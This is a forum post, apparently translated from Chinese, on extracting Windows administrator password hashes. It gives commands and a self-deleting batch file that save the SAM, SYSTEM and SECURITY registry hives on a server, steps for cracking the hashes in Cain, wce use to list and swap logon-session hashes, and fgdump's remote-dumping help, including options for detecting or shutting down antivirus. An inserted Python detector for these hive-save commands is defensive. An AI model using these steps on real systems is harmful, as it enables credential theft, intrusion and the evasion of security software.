好好生活爱自己多些 posted on 2012-5-11 10:44:12

An alternative way to grab the administrator's password hash

While grabbing hashes today I found that GetHashes.exe didn't work, and a few other tools I tried didn't work either.
Different Windows versions need different methods to obtain the hashes.
<div>Tools involved: pwdump7.exe, GetHashes.exe, SAMInside.exe, LC5, Cain, Proactive Password Auditor, Ophcrack.</div>
<div>So I looked up some material on Baidu and am posting it here; I hope everyone can learn something from it.</div>
<div>====================================Method 1===========================================</div>
<div>Tools used: Cain, cmd, wce 1.2, etc.</div>
<div>First, grab the hashes the usual way.</div>
<div>Use the following commands to save a copy of the information we need (run them from an elevated prompt; reg save on these hives needs administrator rights):</div>
<div>reg save hklm\sam sam.hive</div>
<div>reg save hklm\system system.hive</div>
<div>reg save hklm\security security.hive</div>
<div>(I put the three commands into a batch file, which is more convenient.)</div>
<div>==========================</div>
<div>@echo off</div>
<div>reg save hklm\sam sam.hive</div>
<div>reg save hklm\system system.hive</div>
<div>reg save hklm\security security.hive</div>
<div>del %0</div>
<div>===========================</div>
<div>Save it as a .bat file and run it directly on the server.</div>
<div>The three hive files are written to the directory the batch file is in. The batch file deletes itself (del %0), but the hive files stay on disk, so remove them once you have copied them off.</div>
<div>The result is the same as below, just with fewer steps.</div>
<div><img style="WIDTH: 498px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053460.jpg" /></div>
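<div>The defensive side of the same step, as an added example that is not part of the original post: a small Python check that scans process-creation records, shaped like the image and command-line fields of Windows Security event 4688 or Sysmon event 1, for reg.exe saving the SAM, SECURITY or SYSTEM hive, and reports which hosts produced the SAM+SYSTEM pair that is needed to decrypt the hashes offline. The sample events are constructed; the hostnames and paths are made up.</div>

```python
import re
from collections import defaultdict

# reg save / reg export of a hive that holds credential material. Handles "reg" vs
# "reg.exe", the HKLM vs HKEY_LOCAL_MACHINE spelling, extra spaces and a quoted key path.
REG_HIVE_DUMP = re.compile(
    r'\breg(?:\.exe)?\s+(?:save|export)\s+"?(?:hklm|hkey_local_machine)\\(sam|security|system)\b',
    re.IGNORECASE,
)

# Constructed records: (host, image, command line), the way a SIEM exposes the
# NewProcessName / CommandLine fields of event 4688 or Image / CommandLine of Sysmon 1.
SAMPLE_EVENTS = [
    ("WEB01", r"C:\Windows\System32\reg.exe", r"reg save hklm\sam sam.hive"),
    ("WEB01", r"C:\Windows\System32\reg.exe", r"reg  save  HKLM\SYSTEM  C:\Temp\system.hive"),
    ("WEB01", r"C:\Windows\System32\reg.exe", r"reg save hklm\security security.hive"),
    ("WEB01", r"C:\Windows\System32\reg.exe", r"reg query hklm\software\microsoft\windows\currentversion\run"),
    ("DB02", r"C:\Windows\System32\cmd.exe", r'cmd /c "reg.exe save HKEY_LOCAL_MACHINE\Security sec.hiv"'),
    ("DB02", r"C:\Windows\System32\reg.exe", r"reg export HKLM\SOFTWARE\Policies policies.reg"),
]


def flag_hive_dumps(events):
    """Return (host, image, hive) for every record whose command line saves a credential hive."""
    hits = []
    for host, image, cmdline in events:
        m = REG_HIVE_DUMP.search(cmdline)
        if m:
            hits.append((host, image, m.group(1).lower()))
    return hits


def hosts_with_decryptable_dump(hits):
    """SAM alone cannot be cracked offline: the boot key stored in SYSTEM is needed to
    decrypt it. Report hosts where both were saved (SECURITY on top of that adds LSA
    secrets and cached domain logons)."""
    hives = defaultdict(set)
    for host, _image, hive in hits:
        hives[host].add(hive)
    return sorted(host for host, saved in hives.items() if {"sam", "system"} <= saved)


if __name__ == "__main__":
    found = flag_hive_dumps(SAMPLE_EVENTS)
    for host, image, hive in found:
        print(f"{host}: {image} saved {hive.upper()}")
    print("full SAM+SYSTEM dump on:", hosts_with_decryptable_dump(found))
```

<div>This only catches the command-line variant used in this post; hives can also be copied from a volume shadow copy or read by tools that open the files directly, so the command line alone is not a complete detection.</div>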
<div>
<div>Next, open the saved system.hive and security.hive in Cain. I did this inside a VM, so I worked directly there; if you are doing it on a server, download the files to your own machine first.</div>
<div>Open Cain, select LSA Secrets, and load system.hive and security.hive.</div>
<div><img style="WIDTH: 451px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053461.jpg" /></div>
<div>
<div>Once loaded you can see some entries; these may include plaintext passwords, though mine had none.</div>
<div><img style="WIDTH: 388px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053462.jpg" /></div>
<div>
<div>If there is nothing there, we need to grab the hashes: open Cain's Cracker tab and import sam.hive. (Cain needs the boot key to decrypt the SAM; it reads that from system.hive, which is why that hive was saved as well.)</div>
<div><img style="WIDTH: 450px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053463.jpg" /></div>
<div><img style="WIDTH: 452px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053464.jpg" /></div>
<div>
<div>We have the hashes. Now comes cracking: I tried the tool's built-in cracker and the password came out; I had set it to 123456.</div>
<div><img style="WIDTH: 443px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053465.jpg" /></div>
<div>
<div>We can also crack them with rainbow tables.</div>
<div>Next, let's use wce. This tool is a great pentesting utility; look it up yourself for the details.</div>
<div><img style="WIDTH: 482px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053466.jpg" /></div>
<div>
<div>From the help we can see that the -l parameter lists the NTLM hashes of the current logon sessions.</div>
<div>We can also use the -s parameter to change the hash held in the current logon session (it takes user:domain:LM hash:NT hash), as shown in the picture.</div>
<div><img style="WIDTH: 482px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053467.jpg" /></div>
<div>
<div>In the picture you can see that I changed the last digit of the hash from 4 to 5.</div>
<div><img style="WIDTH: 488px; CURSOR: pointer" alt="\" border="0" src="https://img.jbzj.com/do/uploads/allimg/120511/1053468.jpg" /></div>
<div>
<div>====================================Method 2===========================================</div>
<div>fgdump, a tool that can dump hashes remotely</div>
<div>Author: TheLostMind</div>
<div>I had always dumped locally; today on the SamInside forum I came across an open-source tool, fgdump, that can dump remotely.</div>
<div>http://swamp.foofus.net/fizzgig/fgdump/fgdump-usage.htm</div>
<div>&nbsp;fgDump 2.1.0 - fizzgig and the mighty group at foofus.net</div>
<div>Written to make j0m0kun's life just a bit easier</div>
<div>Copyright(C) 2008 fizzgig and foofus.net</div>
<div>fgdump comes with ABSOLUTELY NO WARRANTY!</div>
<div>This is free software, and you are welcome to redistribute it</div>
<div>under certain conditions; see the COPYING and README files for</div>
<div>more information.</div>
<div>Usage:</div>
<div>fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]</div>
<div>where Username and Password have administrator credentials</div>
<div>-? displays help (you're looking at it!)</div>
<div>-t will test for the presence of antivirus without actually running the password dumps</div>
<div>-c skips the cache dump</div>
<div>-w skips the password dump</div>
<div>-s performs the protected storage dump</div>
<div>-r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.</div>
<div>-v makes output more verbose. Use twice for greater effect</div>
<div>-k keeps the pwdump/cachedump going even if antivirus is in an unknown state</div>
<div>-l logs all output to logfile</div>
<div>-T runs fgdump with the specified number of parallel threads</div>
<div>-h is the name of the single host to perform the dumps against</div>
<div>-f reads hosts from a line-separated file</div>
<div>-H reads host:username:password from a line-separated file (per-host credentials)</div>
<div>-o skips pwdump history dumps</div>
<div>-a will not attempt to detect or shut down antivirus, even if it is present</div>
<div>-O manually sets whether the target is a 32- or 64-bit OS. Note that this applies to all hosts specified.</div>
<div>** As of version 1.4.0, you can run fgdump with no parameters to dump the local box (no impersonation or binding)</div>
<div>I tested it and it works well. Here is a quick translation of the help.</div>
<div>Usage:</div>
<div>fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]</div>
<div>The username and password must have administrator rights.</div>
<div>-? show help</div>
<div>-t test for antivirus on the target without actually dumping passwords</div>
<div>-c skip the cache dump</div>
<div>-w skip the password dump</div>
<div>-s perform the protected storage dump</div>
<div>-r ignore existing pwdump/cachedump files. The default is to skip a host for which these files already exist.</div>
<div>-v verbose output. Use it twice for even more detail</div>
<div>-k keep the pwdump/cachedump (password dump) going even if the antivirus state is unknown</div>
<div>-l write all output to a log file</div>
<div>-T run with the given number of parallel threads</div>
<div>-h the single target host to dump passwords from</div>
<div>-f read the host list from a line-separated file</div>
<div>-H read host:username:password from a line-separated file</div>
<div>-o skip the password history dump</div>
<div>-a do not attempt to detect or shut down antivirus, even if it is present</div>
<div>-O manually set whether the remote host runs a 32-bit or 64-bit OS. Note: this applies to every host specified.</div>
<div>** Since version 1.4.0 you can run the program with no parameters to dump the local machine.</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>